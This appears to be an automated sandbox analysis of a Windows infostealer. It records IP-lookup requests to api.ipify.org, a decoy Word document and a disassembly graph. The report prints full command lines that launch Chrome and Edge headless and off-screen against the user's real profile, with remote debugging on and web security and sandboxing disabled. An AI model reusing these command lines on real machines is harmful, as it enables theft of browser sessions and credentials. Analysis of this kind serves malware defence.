                                                                                                                                                                                                                2025-01-14 11:48:28 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 89 5c 24 08 57 48 83 ec 20 48 8b 39 48 8b d9 e8 7b aa 0a 00 48 8b 4b 38 e8 82 9f 01 00 48 8b cb e8 fa 3b 01 00 83 47 58 ff 75 17 80 7f 28 00 75 11 48 8b 4f 70 48 c7 47 70 00 00 00 00 e8 fd 2d 02 00 48 8b 5c 24 30 33 c0 48 83 c4 20 5f c3 0f b6 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 49 8b d8 e8 32 a8 12 00 85 c0 75 1d 8d 48 08 e8 46 0f 0f 00 48 85 c0 74 10 33 c9 48 89 08 48 89 03 33 c0 48 83 c4 20 5b c3 b8 07 00 00 00 48 83 c4 20 5b c3 cc cc cc cc cc cc 48 83 ec 28 e8 77 3b 01 00 33 c0 48 83 c4 28 c3 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec
                                                                                                                                                                                                                Data Ascii: H\$WH H9H{HK8H;GXu(uHOpHGp-H\$03H _A@SH I2uHFHt3HH3H [H [H(w;3H(H\$Ht$WH
                                                                                                                                                                                                                2025-01-14 11:48:28 UTC1369INData Raw: 01 00 83 fd 65 41 0f 44 ec 8b c5 eb ca cc cc cc cc cc cc cc cc cc cc cc 48 8b c4 48 89 58 10 4c 89 40 18 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 60 4c 8b 29 33 ed 0f 29 70 b8 4d 8b f0 0f 29 78 a8 8b da 44 0f 29 40 98 4c 8b e1 41 ff 45 48 44 8b fd 49 63 f9 48 89 68 08 e8 19 a5 0a 00 41 89 5c 24 0c 83 fb 01 0f 85 91 01 00 00 48 8b b4 24 c0 00 00 00 48 8b 0e e8 7b af 01 00 48 8b 1e 44 8b f5 48 8d 2d 8e 85 16 00 48 8b f8 0f b7 4b 14 83 e1 3f 0f b6 04 29 83 f8 03 75 15 33 d2 48 8b cb e8 c1 d9 02 00 0f b7 43 14 83 e0 3f 0f b6 04 28 83 f8 01 74 4e 83 f8 02 75 3c 48 8b 0e 0f b7 41 14 a8 08 74 06 f2 0f 10 01 eb 1c a8 24 74 0a 0f 57 c0 f2 48 0f 2a 01 eb 0e a8 12 74 07 e8 04 9f 09 00 eb 03 0f 57 c0 0f 28 c8 48 8b cf e8 34 e7 0e 00 85 c0 74 0d 33 db 41 c6 44 24 08
                                                                                                                                                                                                                Data Ascii: eADHHXL@UVWATAUAVAWH`L)3)pM)xD)@LAEHDIcHhA\$H$H{HDH-HK?)u3HC?(tNu<HAt$tWH*tW(H4t3AD$
                                                                                                                                                                                                                2025-01-14 11:48:28 UTC1369INData Raw: 0f 2f c7 76 05 49 8b c3 eb 17 f2 48 0f 2c c0 eb 10 a8 12 74 68 48 83 79 08 00 74 61 e8 3e 9a 09 00 0f 57 c0 48 b9 00 00 00 00 00 00 01 00 f2 48 0f 2a c0 f2 0f 11 44 3b 08 48 3b c1 7d 13 48 b9 00 00 00 00 00 00 ff ff 48 3b c1 0f 8f b3 00 00 00 8b 44 3b 04 83 f8 43 75 0d c7 44 3b 04 42 00 00 00 e9 9d 00 00 00 83 f8 45 0f 85 94 00 00 00 c7 44 3b 04 44 00 00 00 e9 87 00 00 00 48 c7 44 3b 08 00 00 00 00 e9 79 00 00 00 83 fa 02 75 48 4b 8b 0c f9 0f b7 41 14 a8 08 74 0c f2 0f 10 01 f2 0f 11 44 3b 08 eb 5c a8 24 74 10 0f 57 c0 f2 48 0f 2a 01 f2 0f 11 44 3b 08 eb 48 a8 12 74 0d e8 ca 99 09 00 f2 0f 11 44 3b 08 eb 37 f2 0f 11 74 3b 08 0f 28 c6 eb 2c 48 c7 44 3b 08 00 00 00 00 83 fa 05 75 0a c7 44 3b 04 40 00 00 00 eb 14 33 c0 41 80 e8 42 41 80 f8 01 0f 97 c0 83 c0
                                                                                                                                                                                                                Data Ascii: /vIH,thHyta>WHH*D;H;}HH;D;CuD;BED;DHD;yuHKAtD;\$tWH*D;HtD;7t;(,HD;uD;@3ABA
                                                                                                                                                                                                                2025-01-14 11:48:28 UTC1369INData Raw: 0f 11 43 40 33 c0 48 8b 4c 24 50 48 33 cc e8 e3 9a 14 00 4c 8d 5c 24 60 49 8b 5b 30 49 8b 6b 40 49 8b 73 48 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 90 96 1e 00 00 9d 1e 00 00 a4 1e 00 00 a8 1e 00 00 af 1e 00 00 b3 1e 00 00 e3 1e 00 00 00 06 01 06 06 06 02 06 06 06 06 06 06 06 03 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 04 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 05 cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 49 8b f0 48 8b da 8b f9 e8 24 98 12 00 85 c0 0f 85 22 01 00 00 b9 88 00 00 00 e8 32 ff 0e 00 4c 8b c8 48 85 c0 0f 84 0c 01 00 00 0f 57 c0 33 c0 41 0f 11 01 41 0f 11 41 10 41 0f 11 41 20 41 0f 11 41 30 41 0f 11 41 40 41 0f 11 41 50 41 0f 11 41 60 41 0f 11 41 70 49 89 81
                                                                                                                                                                                                                Data Ascii: C@3HL$PH3L\$`I[0Ik@IsHIA_A^A]A\_H\$Ht$WH IH$"2LHW3AAAAA AA0AA@AAPAA`AApI
                                                                                                                                                                                                                2025-01-14 11:48:28 UTC1369INData Raw: 20 48 8b 8c 24 80 00 00 00 48 89 01 eb 30 48 8b 8c 24 88 00 00 00 48 8d 15 20 b9 16 00 4c 8b c3 e8 18 1c 0d 00 bb 01 00 00 00 48 8b 4c 24 28 48 85 c9 74 0a 49 8b 45 10 ff 15 97 1e 16 00 49 8b ce e8 b7 26 01 00 4c 8b 7c 24 30 8b c3 4c 8b 64 24 78 48 8b 7c 24 70 48 8b 6c 24 60 48 83 c4 38 41 5e 41 5d 5e 5b c3 cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b 41 18 48 8b d9 48 8b 49 20 48 8b 40 10 ff 15 4d 1e 16 00 48 8b cb e8 6d 26 01 00 33 c0 48 83 c4 20 5b c3 cc cc cc cc cc 44 8b 02 33 c9 45 85 c0 7e 24 48 8b 42 08 48 83 c0 04 80 78 01 00 74 0b 83 78 fc 00 75 05 80 38 02 74 15 ff c1 48 83 c0 0c 41 3b c8 7c e4 c7 42 28 00 00 00 00 33 c0 c3 48 8b 42 20 48 63 c9 c7 42 28 01 00 00 00 c7 04 c8 01 00 00 00 48 8b 42 20 c6 44 c8 04 01 48 b8 00 00 00 00 00 00 f0 3f 48 89
                                                                                                                                                                                                                Data Ascii: H$H0H$H LHL$(HtIEI&L|$0Ld$xH|$pHl$`H8A^A]^[@SH HAHHI H@MHm&3H [D3E~$HBHxtxu8tHA;|B(3HB HcB(HB DH?H
                                                                                                                                                                                                                2025-01-14 11:48:28 UTC1369INData Raw: c2 49 83 c3 18 41 83 fa 50 72 c9 48 8b 7c 24 10 b8 0c 00 00 00 5b c3 4b 8d 0c 52 48 8b 44 cf 10 48 85 c0 75 0a 48 8b 44 cf 08 48 89 44 cf 10 48 85 db 48 0f 44 d8 33 c0 48 89 5c cf 08 48 8b 7c 24 10 5b c3 48 89 5c 24 08 48 8d 1d 34 a5 19 00 4c 8b da 4c 8b d3 45 33 c9 66 66 66 0f 1f 84 00 00 00 00 00 4d 8b 02 49 8b c3 4d 2b c3 0f 1f 80 00 00 00 00 0f b6 10 42 0f b6 0c 00 2b d1 75 07 48 ff c0 85 c9 75 ed 85 d2 74 15 41 ff c1 49 83 c2 18 41 83 f9 50 72 cc 33 c0 48 8b 5c 24 08 c3 4b 8d 04 49 48 8b 44 c3 08 48 8b 5c 24 08 c3 cc cc cc cc cc 40 57 48 8d 3d c7 a4 19 00 4c 8b da 41 b8 ff ff ff ff 48 85 d2 74 51 48 89 5c 24 10 45 33 c0 48 8d 1d 12 ac 19 00 4c 8b d7 0f 1f 80 00 00 00 00 4d 8b 0a 49 8b c3 4d 2b cb 0f 1f 80 00 00 00 00 0f b6 10 42 0f b6 0c 08 2b d1 75
                                                                                                                                                                                                                Data Ascii: IAPrH|$[KRHDHuHDHDHHD3H\H|$[H\$H4LLE3fffMIM+B+uHutAIAPr3H\$KIHDH\$@WH=LAHtQH\$E3HLMIM+B+u
                                                                                                                                                                                                                2025-01-14 11:48:28 UTC1369INData Raw: 01 00 48 8b 8e 88 00 00 00 e8 ed 6d 01 00 48 8b 8e 88 00 00 00 8b d8 e8 9f 80 01 00 83 fb 64 44 8b e0 48 8d 1d 02 d0 ff ff 75 20 48 8b 46 18 0f b6 48 6c 80 bc 19 f3 9c 16 00 05 48 8b ce 75 18 48 8b d7 e8 c3 c6 0a 00 44 8b e0 41 b8 01 00 00 00 44 89 44 24 20 eb 11 33 d2 e8 2c c4 0a 00 e9 5a 03 00 00 48 8b 7c 24 40 49 8b 0f 0f b7 51 14 8b c2 83 e0 3f 80 bc 18 30 9b 16 00 05 74 5f 0f b7 c2 a8 24 74 05 4c 8b 29 eb 40 a8 08 74 25 f2 0f 10 01 66 44 0f 2f d8 77 31 66 41 0f 2f c2 76 0c 49 bd ff ff ff ff ff ff ff 7f eb 1e f2 4c 0f 2c e8 eb 17 a8 12 74 10 48 39 69 08 74 0a e8 38 84 09 00 4c 8b e8 eb 03 4c 8b ed 49 8b d5 48 8b ce e8 35 c6 0a 00 44 8b 44 24 20 44 8b e0 45 85 e4 0f 85 da 02 00 00 41 83 fe 01 0f 8e d0 02 00 00 48 89 6c 24 28 45 85 c0 0f 85 87 00 00 00
                                                                                                                                                                                                                Data Ascii: HmHdDHu HFHlHuHDADD$ 3,ZH|$@IQ?0t_$tL)@t%fD/w1fA/vIL,tH9it8LLIH5DD$ DEAHl$(E


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                22192.168.2.649884104.26.12.2054434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:31 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                2025-01-14 11:48:31 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:31 GMT
                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                Content-Length: 12
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                CF-RAY: 901d65bf3dc6c402-EWR
                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1517&rtt_var=595&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=677&delivery_rate=1924851&cwnd=167&unsent_bytes=0&cid=92ea14d04b99ea03&ts=142&x=0"
                                                                                                                                                                                                                2025-01-14 11:48:31 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                                Data Ascii: 8.46.123.189


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                23192.168.2.649886104.26.12.2054434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:31 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                2025-01-14 11:48:31 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:31 GMT
                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                Content-Length: 12
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                CF-RAY: 901d65c31f2d4269-EWR
                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1572&rtt_var=593&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1839949&cwnd=250&unsent_bytes=0&cid=12ccf2ee60e4f991&ts=152&x=0"
                                                                                                                                                                                                                2025-01-14 11:48:31 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                                Data Ascii: 8.46.123.189


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                24192.168.2.649898104.26.12.2054434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:32 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                2025-01-14 11:48:32 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:32 GMT
                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                Content-Length: 12
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                CF-RAY: 901d65c9d9807c81-EWR
                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1965&rtt_var=744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1462925&cwnd=241&unsent_bytes=0&cid=534cadc2c9c98005&ts=134&x=0"
                                                                                                                                                                                                                2025-01-14 11:48:32 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                                Data Ascii: 8.46.123.189


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                25192.168.2.649904104.26.12.2054434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:33 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                2025-01-14 11:48:33 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:33 GMT
                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                Content-Length: 12
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                CF-RAY: 901d65cdba1cc402-EWR
                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1498&rtt_var=567&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1922317&cwnd=167&unsent_bytes=0&cid=ba52bf90a133fb15&ts=152&x=0"
                                                                                                                                                                                                                2025-01-14 11:48:33 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                                Data Ascii: 8.46.123.189


                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                Start time:06:48:00
                                                                                                                                                                                                                Start date:14/01/2025
                                                                                                                                                                                                                Path:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\StL9joVVcT.exe"
                                                                                                                                                                                                                Imagebase:0x7ff7e25f0000
                                                                                                                                                                                                                File size:26'503'168 bytes
                                                                                                                                                                                                                MD5 hash:ACA235134C2D590750CF0710F9324B77
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                Start time:06:48:01
                                                                                                                                                                                                                Start date:14/01/2025
                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                                                Imagebase:0x7ff715da0000
                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                Start time:06:48:01
                                                                                                                                                                                                                Start date:14/01/2025
                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9478 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                Start time:06:48:01
                                                                                                                                                                                                                Start date:14/01/2025
                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1328 --field-trial-handle=1468,i,7079440847990403330,1816915904370043834,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                                                Imagebase:0x7ff715da0000
                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                Start time:06:48:01
                                                                                                                                                                                                                Start date:14/01/2025
                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1592 --field-trial-handle=1468,i,8309244581088940151,1706342742700120984,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:8
                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                Start time:06:48:03
                                                                                                                                                                                                                Start date:14/01/2025
                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""
                                                                                                                                                                                                                Imagebase:0xaf0000
                                                                                                                                                                                                                File size:1'620'872 bytes
                                                                                                                                                                                                                MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                  Execution Coverage:1.3%
                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                  Signature Coverage:16.5%
                                                                                                                                                                                                                  Total number of Nodes:812
                                                                                                                                                                                                                  Total number of Limit Nodes:128
                                                                                                                                                                                                                  execution_graph 106889 7ffd9444be60 106890 7ffd9444be87 106889->106890 106891 7ffd9444bf3b 106889->106891 106893 7ffd9444c01b 106890->106893 106896 7ffd9444be8d _raise_excf 106890->106896 106898 7ffd9444bf42 106890->106898 106897 7ffd9444bf69 106891->106897 106891->106898 106912 7ffd943c4c20 106891->106912 106918 7ffd943d8730 11 API calls _raise_excf 106893->106918 106896->106898 106899 7ffd9444bff2 106896->106899 106900 7ffd9444bfe6 106896->106900 106903 7ffd9443cc00 106897->106903 106917 7ffd9444b8c0 30 API calls _raise_excf 106899->106917 106916 7ffd94473ce0 11 API calls _raise_excf 106900->106916 106904 7ffd9443cc1d 106903->106904 106905 7ffd9443cc64 106903->106905 106938 7ffd943d8730 11 API calls _raise_excf 106904->106938 106919 7ffd9443e4b0 106905->106919 106907 7ffd9443cc4e 106907->106890 106908 7ffd9443cc79 106910 7ffd9443cc7d _raise_excf 106908->106910 106939 7ffd943e3130 11 API calls _raise_excf 106908->106939 106910->106890 106913 7ffd943c4c29 106912->106913 106914 7ffd943c4c84 106912->106914 106913->106914 106992 7ffd9450996c 106913->106992 106914->106897 106916->106898 106917->106898 106918->106898 106920 7ffd9443e4d2 106919->106920 106921 7ffd9443e505 106919->106921 106954 7ffd943d8730 11 API calls _raise_excf 106920->106954 106940 7ffd943be160 106921->106940 106923 7ffd9443e530 _raise_excf 106924 7ffd9443e6a4 106923->106924 106925 7ffd9443e64c 106923->106925 106929 7ffd9443e4fe new[] 106923->106929 106932 7ffd9443e5f6 _raise_excf 106923->106932 106928 7ffd9443e6d2 106924->106928 106930 7ffd9443e6bc 106924->106930 106955 7ffd943d8730 11 API calls _raise_excf 106925->106955 106928->106932 106934 7ffd9443e6ee 106928->106934 106929->106908 106948 7ffd94458340 106930->106948 106932->106929 106956 7ffd94451310 30 API calls _raise_excf 106932->106956 106933 7ffd9443e715 106958 7ffd943dbe10 11 API calls 2 library calls 106933->106958 106934->106929 106934->106933 106957 7ffd9446bae0 11 API calls 2 library calls 106934->106957 106938->106907 106939->106910 106942 7ffd943be178 106940->106942 106941 7ffd943be194 106941->106923 106942->106941 106946 7ffd944557b3 106942->106946 106968 7ffd94455a50 11 API calls new[] 106942->106968 106944 7ffd94455883 106959 7ffd94455470 106944->106959 106946->106941 106946->106944 106946->106946 106969 7ffd94455a10 11 API calls _raise_excf 106946->106969 106949 7ffd94458377 106948->106949 106950 7ffd9445836a 106948->106950 106952 7ffd94458387 106949->106952 106981 7ffd943b36f0 106949->106981 106989 7ffd944cf510 29 API calls _raise_excf 106950->106989 106952->106932 106954->106929 106955->106932 106956->106929 106957->106933 106958->106929 106963 7ffd944555af 106959->106963 106964 7ffd94455498 106959->106964 106960 7ffd944555b4 106975 7ffd944552f0 11 API calls new[] 106960->106975 106961 7ffd944555a1 106974 7ffd944552f0 11 API calls new[] 106961->106974 106963->106941 106967 7ffd94455511 106964->106967 106970 7ffd944a1fc0 106964->106970 106967->106960 106967->106961 106967->106963 106968->106946 106969->106944 106971 7ffd944a20a1 106970->106971 106972 7ffd944a1fd9 106970->106972 106971->106967 106972->106971 106976 7ffd943c39b0 106972->106976 106974->106963 106975->106963 106977 7ffd943c39c5 106976->106977 106978 7ffd943c39df 106977->106978 106980 7ffd943d8730 11 API calls _raise_excf 106977->106980 106978->106971 106980->106978 106982 7ffd943b371d _raise_excf 106981->106982 106983 7ffd943b37a0 ReadFile 106982->106983 106984 7ffd943b3858 106982->106984 106985 7ffd943b3734 new[] _raise_excf 106982->106985 106987 7ffd943b3830 106982->106987 106983->106982 106983->106984 106984->106985 106991 7ffd943d8730 11 API calls _raise_excf 106984->106991 106985->106952 106990 7ffd944f1a30 19 API calls _raise_excf 106987->106990 106989->106949 106990->106985 106991->106985 106993 7ffd94509971 RtlFreeHeap 106992->106993 106994 7ffd945099a0 106992->106994 106993->106994 106995 7ffd9450998c GetLastError 106993->106995 106994->106914 106996 7ffd94509999 __free_lconv_num 106995->106996 106998 7ffd94509ec8 11 API calls __free_lconv_num 106996->106998 106998->106994 106999 7ffd943c5430 107014 7ffd944db8a0 106999->107014 107001 7ffd943c544c 107002 7ffd944a1fc0 new[] 11 API calls 107001->107002 107012 7ffd943c5563 _raise_excf 107001->107012 107003 7ffd943c546f 107002->107003 107013 7ffd943c54f9 107003->107013 107033 7ffd944cafa0 11 API calls _raise_excf 107003->107033 107005 7ffd943c54b3 107010 7ffd943c54cd 107005->107010 107005->107013 107106 7ffd944e0e80 11 API calls _raise_excf 107005->107106 107006 7ffd943c5548 107008 7ffd943c4c20 _raise_excf 11 API calls 107006->107008 107006->107012 107008->107012 107010->107013 107034 7ffd9444f5d0 107010->107034 107013->107006 107013->107012 107107 7ffd944e27e0 11 API calls _raise_excf 107013->107107 107015 7ffd944db8ad 107014->107015 107016 7ffd944db8b5 _raise_excf 107014->107016 107015->107001 107018 7ffd944db93c new[] _raise_excf 107016->107018 107032 7ffd944dbc14 107016->107032 107117 7ffd944db1d0 11 API calls _raise_excf 107016->107117 107022 7ffd944dbadf 107018->107022 107018->107032 107118 7ffd944db1d0 11 API calls _raise_excf 107018->107118 107019 7ffd944db8a0 _raise_excf 12 API calls 107021 7ffd944dbb0c 107019->107021 107023 7ffd944a1fc0 new[] 11 API calls 107021->107023 107021->107032 107022->107019 107022->107032 107024 7ffd944dbb1c 107023->107024 107025 7ffd943c4c20 _raise_excf 11 API calls 107024->107025 107024->107032 107026 7ffd944dbb2d 107025->107026 107108 7ffd944dbe70 GetSystemInfo 107026->107108 107029 7ffd944db8a0 _raise_excf 12 API calls 107031 7ffd944dbb41 107029->107031 107030 7ffd944db8a0 _raise_excf 12 API calls 107030->107032 107031->107030 107031->107032 107032->107001 107033->107005 107035 7ffd944db8a0 _raise_excf 12 API calls 107034->107035 107037 7ffd9444f607 107035->107037 107036 7ffd9444fec6 107036->107013 107037->107036 107038 7ffd944a1fc0 new[] 11 API calls 107037->107038 107039 7ffd9444f67d new[] 107038->107039 107040 7ffd9444f6e3 107039->107040 107042 7ffd9444f6ba 107039->107042 107043 7ffd9444f6a6 